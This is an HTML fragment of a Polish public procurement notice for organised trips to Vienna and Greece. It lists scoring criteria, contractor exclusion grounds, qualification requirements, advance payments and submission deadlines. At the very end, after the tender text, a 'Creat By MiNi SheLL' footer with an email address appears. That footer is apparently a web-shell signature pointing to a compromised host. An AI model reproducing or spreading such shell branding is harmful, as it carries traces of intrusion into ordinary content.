Wykonawca nie obniży ceny za<br/>dodatkowych uczestników)<br/>− 20 pkt. (wariant B) – Wykonawca obniży cenę o kwotę<br/>40,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 41-45 osób i o 80,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników 46-<br/>50 osób<br/>− 40 pkt. (wariant C) – Wykonawca obniży cenę o kwotę<br/>60,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 41-45 osób i o 120,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników 46-<br/>50 osób<br/>UWAGA: Brak zaznaczenia pola w punkcie 1d)<br/>Formularza ofertowego spowoduje, że Wykonawca<br/>otrzyma „0” (zero) punktów w niniejszym kryterium..<br/>4. Najkorzystniejsza oferta może uzyskać maksymalnie 100 punktów, w tym:<br/>- maksymalna ilość punktów za cenę (60pkt) otrzymuje Wykonawca z najniższa ceną<br/>oferty, kolejne oferty będą oceniane wg powyższego wzoru,- maksymalną ilość punktów za obniżenie ceny za dodatkowych uczestników wycieczki<br/>(40 pkt) otrzymuje Wykonawca za zaoferowanie do 60,00 zł obniżki ceny wycieczki<br/>dla każdego uczestnika ponad stan 30 osób – Grecja, 40 osób – Wiedeń (maksymalna<br/>liczba uczestników 35 osoby Grecja i 45 osób Wiedeń).<br/>5. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>6. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę<br/>danej oferty.<br/>K1 + K2 = suma punktów<br/>K1 - ilość punktów uzyskanych w kryterium cena<br/>K2 - ilość punktów uzyskanych w kryterium obniżenie ceny za dodatkowych uczestników<br/>7. Oferta może uzyskać maksymalnie 100 punktów.<br/>8. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>9. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę<br/>danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">obniżenie ceny za dodatkowych uczestników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) W zakresie zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>2) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełni warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej jeżeli wykaże, że jest wpisany do Centralnej Ewidencji Organizatorów<br/>Turystyki i Przedsiębiorców Ułatwiających Nabywanie Powiązanych Usług Turystycznych zgodnie z właściwymi<br/>postanowieniami ustawy o imprezach turystycznych i powiązanych usługach turystycznych lub w przypadku Wykonawców<br/>mających siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, którzy nie podlegają obowiązkowi<br/>wpisu do ww. rejestru – posiadają odpowiednie zezwolenie, licencję, koncesję lub są wpisani do rejestru działalności<br/>regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia usług obejmujących działalność w zakresie organizowania<br/>imprez turystycznych oraz ułatwiania nabywania powiązanych usług turystycznych w kraju, w którym wykonawca ma<br/>siedzibę lub miejsce zamieszkania lub posiadają status członka organizacji, jeżeli członkostwo w tej organizacji jest<br/>niezbędne do świadczenia usług obejmujących działalność w zakresie organizowania imprez turystycznych oraz ułatwiania<br/>nabywania powiązanych usług turystycznych w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.<br/>3) W zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>4) W zakresie zdolności technicznej lub zawodowej.:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy to w<br/>tym okresie, wykonał/zakończył co najmniej 2 usługi, każda z nich polegająca na kompleksowej organizacji wycieczki<br/>turystycznej zawierającej organizację transportu, noclegu oraz obsługę koordynatora do krajów z terenu Unii Europejskiej<br/>każda, o wartości każda co najmniej 60 000,00 zł; - dla każdego zadania częściowego osobno<br/>b) dysponuje lub będzie dysponować:<br/>1 osobą pełniącą funkcję Koordynatora, który będzie obecny przez cały czas trwania wycieczki do Wiednia / Grecji, który<br/>posiada doświadczenie w pełnieniu funkcji koordynatora/opiekuna/pilota w co najmniej 2 wycieczkach do krajów z terenu<br/>Unii Europejskiej w okresie ostatnich 3 lat przed upływem terminu składania ofert – dla każdego zadania częściowego<br/>osobno<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie<br/>oświadczenia wykonawcy o spełnianiu warunków oraz wykazu zrealizowanych dostaw, potwierdzonych dowodami.<br/>W trakcie wykonywania zamówienia, w przypadku zaistnienia okoliczności uniemożliwiających lub utrudniających dalsze<br/>wykonywanie obowiązków przez osoby wskazane przez Wykonawcę w Wykazie osób, które będą uczestniczyć w<br/>wykonywaniu zamówienia, Wykonawca będzie mógł je zmienić, z zastrzeżeniem, iż w takiej sytuacji Wykonawca<br/>obowiązany będzie przedstawić do zatwierdzenia Zamawiającemu osobę, która będzie posiadała, co najmniej takie<br/>kwalifikacje (wykazane w zakresie warunków udziału w postępowaniu oraz otrzymałaby w ramach przyjętych kryteriów<br/>oceny ofert taką samą liczbę punktów) jak osoba w wykazie osób, którą ma zastąpić. Wykonawcy nie będzie przysługiwać<br/>roszczenie o zwrot kosztów wynikających bezpośrednio z usunięcia lub wymiany osób, wyznaczonych przez Wykonawcę do<br/>wykonania przedmiotu zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2) W celu potwierdzenia<br/>braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający żąda:<br/>a) oświadczenia wykonawcy, sporządzonego zgodnie z załącznikiem nr 9 do SWZ, o aktualności informacji zawartych w<br/>Oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia, o<br/>których mowa w:<br/>• art. 108 ust. 1 pkt 1) lub 2) ustawy Pzp,<br/>• art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>• art. 108 ust. 1 pkt 4) ustawy Pzp,<br/>• art. 108 ust. 1 pkt 5) ustawy Pzp, odnośnie zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>• art. 108 ust. 1 pkt 6) ustawy Pzp,<br/>• art. 109 ust. 1 pkt 5) ustawy Pzp,<br/>• art. 109 ust. 1 pkt 7) ustawy Pzp,<br/>• art. 109 ust. 1 pkt 8) ustawy Pzp<br/>• art. 109 ust. 1 pkt 9) ustawy Pzp<br/>• art. 109 ust. 1 pkt 10) ustawy Pzp<br/>• art. 7 ust. 1 pkt 1) –pkt 3) ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2023 r., poz. 1497 z późn. Zm).<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>c) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz.U. z 2023 r. poz. 1689 z późn. zm.), z<br/>innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej, Zamawiający żąda:<br/>Wykazu usług wykonanych lub wykonywanych nie wcześniej niż w okresie ostatnich 3 lat (liczonych wstecz od dnia, w którym<br/>upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - w zakresie niezbędnym do wykazania spełniania warunku<br/>udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 4 niniejszego SWZ. Wzór wykazu stanowi załącznik nr 7 do SWZ;<br/>Uwaga: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami,<br/>wykaz o którym mowa powyżej, dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> zamawiający dopuszcza możliwość wypłaty zaliczki do 30 % wartości umowy w terminie do 14 dni od daty określenia ostatecznej liczby uczestników podanej w formularzu ofertowym w pkt 1e), <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust.1 Ustawy Prawo zamówień publicznych Strony mogą zmienić postanowienia zawartej umowy, w<br/>następujących przypadkach:<br/>a) zmiany terminu wykonania umowy w przypadku zaistnienia wydarzeń uniemożliwiających realizację umowy, tj. wojna,<br/>klęski żywiołowe, strajki, itp. (tzw. siła wyższa), z tym zastrzeżeniem, że wystąpienie tych zdarzeń musi mieć rzeczywisty<br/>wpływ na realizację przedmiotu umowy lub przedłużenie terminu wykonania umowy, przy czym przedłużenie terminu<br/>wykonania umowy może nastąpić o ilość dni odpowiadających wystąpieniu powyższych okoliczności,<br/>b) zmiany terminu wykonania umowy w przypadku okoliczności uniemożliwiających lub w znacznym stopniu opóźniających<br/>wykonanie przedmiotu umowy z przyczyn niezależnych od Wykonawcy to jest takich, których skutkom Wykonawca<br/>działający z należytą starannością nie mógł zapobiec, z tym zastrzeżeniem, że przyczyny te mają rzeczywisty wpływ na<br/>termin wykonania umowy.<br/>c) w razie gdy niezbędna jest zmiana sposobu wykonania przedmiotu umowy ze względów technicznych, technologicznych<br/>lub organizacyjnych, o ile zmiana ta jest korzystna dla Zamawiającego lub konieczna w celu prawidłowego wykonania<br/>umowy, a brak zmiany sposobu wykonania umowy skutkowałby niewykonaniem lub wadliwym wykonaniem przedmiotu<br/>umowy, pod warunkiem, że Wykonawca zaoferuje rozwiązanie techniczne, technologiczne lub organizacyjne o<br/>równoważnych lub lepszych parametrach.<br/>Wystąpienie jednej z powyższych okoliczności może skutkować zmianą OPZ lub umowy w zakresie sposobu wykonania<br/>zobowiązania przez strony oraz terminu realizacji w takim zakresie w jakim jest to konieczne do dostosowania do zmian<br/>sposobu wykonania zobowiązania lub w zakresie wynikającym z czasu wystąpienia okoliczności uniemożliwiających lub w<br/>znacznym stopniu opóźniających wykonanie umowy.<br/>Zmiany umowy w zakresie określenia ostatecznej liczby uczestników podanym w formularzu ofertowym w pkt 1e) skutkujące<br/>zmianą wartości umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_lubaczow/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-29 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com